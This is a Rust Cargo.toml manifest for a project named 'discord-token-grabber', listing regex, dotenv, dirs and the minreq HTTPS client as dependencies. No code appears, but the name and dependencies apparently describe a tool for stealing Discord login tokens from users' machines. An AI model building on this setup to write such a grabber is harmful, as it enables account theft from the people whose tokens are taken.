[package]
name = "discord-token-grabber"
version = "0.1.0"
authors = ["TheMaestro <contact@themaestro.site>"]
edition = "2018"

[dependencies]
regex = "1.5.4"
dotenv = "0.15.0"
minreq = { version = "2.4.2", features = ["https"] }
dirs = "4.0.0"